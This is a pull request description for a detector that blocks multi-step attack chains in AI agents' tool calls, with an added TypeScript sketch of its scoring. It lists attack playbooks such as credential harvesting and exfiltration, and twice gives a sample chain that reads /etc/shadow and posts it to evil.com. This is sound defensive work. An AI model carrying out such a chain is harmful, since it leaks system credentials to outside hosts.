feat: multi-step attack-pattern detector with confidence scoring#5
Open
azizx4 wants to merge 1 commit into
Add a new `meta`-kind detector that identifies multi-step attack chains by tracking per-agent tool-call history and matching against known attack playbooks. Each match is scored using contextual signals (data sensitivity, destination trust, timing, upstream anomaly signals) to minimize false positives.

8 built-in attack patterns:
- DATA_EXFIL (AAT-T5010): sensitive read → outbound send
- CRED_HARVEST (AAT-T5011): credential discovery → exfiltration
- PRIV_ESCALATION (AAT-T5012): recon → sensitive read → priv exec
- PROMPT_INJECTION_CHAIN (AAT-T1001): context poison → exploit
- DESTRUCTIVE_ACTION (AAT-T8004): recon → delete/drop/truncate
- ENCODED_EXFIL (AAT-T9001): sensitive read → encode → send
- SUPPLY_CHAIN (AAT-T1003): package install → execute
- ARTIFACT_BACKDOOR (AAT-T6003): write backdoor file → execute

Key features:
- Confidence scoring (0-100) with configurable block/flag thresholds
- Custom Rules API: addRule() / removeRule() / getRules()
- PPM upstream integration: sequence_anomaly signals boost confidence
- SlidingWindowStats integration: burst detection increases confidence
- Environment-configurable via ATTACK_PATTERN_* env vars
- Wired into /api/v1/check: critical detector signals block requests

77 new tests across 3 test files. All 558 project tests pass.
Summary

Adds a new meta-kind detector (aegis.builtin.attack-pattern) that catches multi-step attack chains that existing single-step detectors miss. Each call is individually benign, but the sequence reveals the attack.

Example: read_file("/etc/shadow") → http_post("https://evil.com") — each step passes on its own, but together it's data exfiltration. This detector blocks it.

What's new

- 8 built-in attack playbooks with confidence scoring (0–100): DATA_EXFIL, CRED_HARVEST, PRIV_ESCALATION, PROMPT_INJECTION_CHAIN, DESTRUCTIVE_ACTION, ENCODED_EXFIL, SUPPLY_CHAIN, ARTIFACT_BACKDOOR
- Confidence scoring with contextual bonuses/penalties: blockThreshold (default 70), flagThreshold (default 40)
- Custom Rules API: addRule() / removeRule() / getRules() — tenants can define their own attack playbooks at runtime
- Wired into /api/v1/check: DetectorRegistry now participates in the check decision pipeline. Critical detector signals block requests (Layer 4, after policy + anomaly + DSL).
- Environment-configurable: ATTACK_PATTERN_ENABLED, ATTACK_PATTERN_BLOCK_THRESHOLD, ATTACK_PATTERN_FLAG_THRESHOLD, ATTACK_PATTERN_WINDOW_MS

How it differs from existing SEQUENCE_ANOMALY

Both are complementary — PPM surprise feeds into this detector's confidence as a bonus signal.

Files changed

- detectors/built-in/attack-pattern-detector.ts
- __tests__/attack-pattern-detector.test.ts
- __tests__/attack-pattern-integration.test.ts
- __tests__/attack-pattern-vs-existing.test.ts
- detectors/index.ts
- config.ts (attackPattern config section)
- server.ts
- api/check.ts

Test plan

- tsc --noEmit)
- read_file("/etc/shadow") → http_post("evil.com") returns "decision": "block" with reason "Multi-Step Data Exfiltration detected (confidence 90%)"
- read_file("report.pdf") → send_email("boss@company.internal") passes through as "allow"
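The following is an added TypeScript illustration of the design the PR describes (per-agent sliding window of tool calls, in-order playbook matching, contextual confidence scoring checked against block/flag thresholds); it is not the PR's own code. The single playbook, the sensitivity and destination-trust heuristics, and the base score and bonus values are all assumptions, chosen so that the two test-plan cases come out as block at 90% and allow.

```typescript
// Added example, not the project's code: a minimal per-agent sliding-window matcher
// for multi-step tool-call chains with contextual confidence scoring.
type ToolCall = { agent: string; tool: string; arg: string; ts: number };
type Playbook = { id: string; name: string; steps: string[][] }; // each step: accepted tools
type Verdict = { decision: "block" | "flag" | "allow"; reason?: string };
// Assumed heuristics for the two contextual signals (data sensitivity, destination trust).
const SENSITIVE = [/\/etc\/shadow$/, /\.ssh\//, /\.env$/, /credential/i];
const TRUSTED_DEST = [/\.internal$/, /^localhost$/];
const PLAYBOOKS: Playbook[] = [
  { id: "AAT-T5010", name: "Multi-Step Data Exfiltration",
    steps: [["read_file", "db_query"], ["http_post", "send_email"]] },
];
// Host part of a URL or e-mail address, used for the destination-trust signal.
function hostOf(arg: string): string {
  return arg.replace(/^[a-z]+:\/\//i, "").split("/")[0].split("@").pop() ?? "";
}
// In-order subsequence match: each playbook step must be satisfied by a later call.
function matchSteps(calls: ToolCall[], steps: string[][]): ToolCall[] | null {
  const matched: ToolCall[] = [];
  for (const c of calls) {
    if (matched.length < steps.length && steps[matched.length].includes(c.tool)) matched.push(c);
  }
  return matched.length === steps.length ? matched : null;
}
// Confidence = base score plus contextual bonuses/penalties, clamped to 0-100 (assumed values).
function score(matched: ToolCall[]): number {
  let conf = 50; // the whole chain occurred inside one window
  if (matched.some(c => SENSITIVE.some(rx => rx.test(c.arg)))) conf += 25; // sensitive data touched
  const trusted = TRUSTED_DEST.some(rx => rx.test(hostOf(matched[matched.length - 1].arg)));
  conf += trusted ? -20 : 15; // final step sends to an untrusted destination
  return Math.max(0, Math.min(100, conf));
}
class AttackPatternDetector {
  private history = new Map<string, ToolCall[]>();
  constructor(private windowMs = 300_000, private blockThreshold = 70, private flagThreshold = 40) {}
  check(call: ToolCall): Verdict {
    // Keep only this agent's calls still inside the sliding window, then append the new one.
    const calls = (this.history.get(call.agent) ?? []).filter(c => call.ts - c.ts <= this.windowMs);
    calls.push(call);
    this.history.set(call.agent, calls);
    let best = { conf: 0, name: "" }; // highest-confidence playbook match, if any
    for (const pb of PLAYBOOKS) {
      const m = matchSteps(calls, pb.steps);
      if (m) { const conf = score(m); if (conf > best.conf) best = { conf, name: pb.name }; }
    }
    const decision = best.conf >= this.blockThreshold ? "block" : best.conf >= this.flagThreshold ? "flag" : "allow";
    return decision === "allow" ? { decision } : { decision, reason: `${best.name} detected (confidence ${best.conf}%)` };
  }
}
```

A sensitive read followed by a send to a trusted internal address lands between the two thresholds and is flagged rather than blocked, which is the kind of middle ground the contextual scoring is meant to preserve.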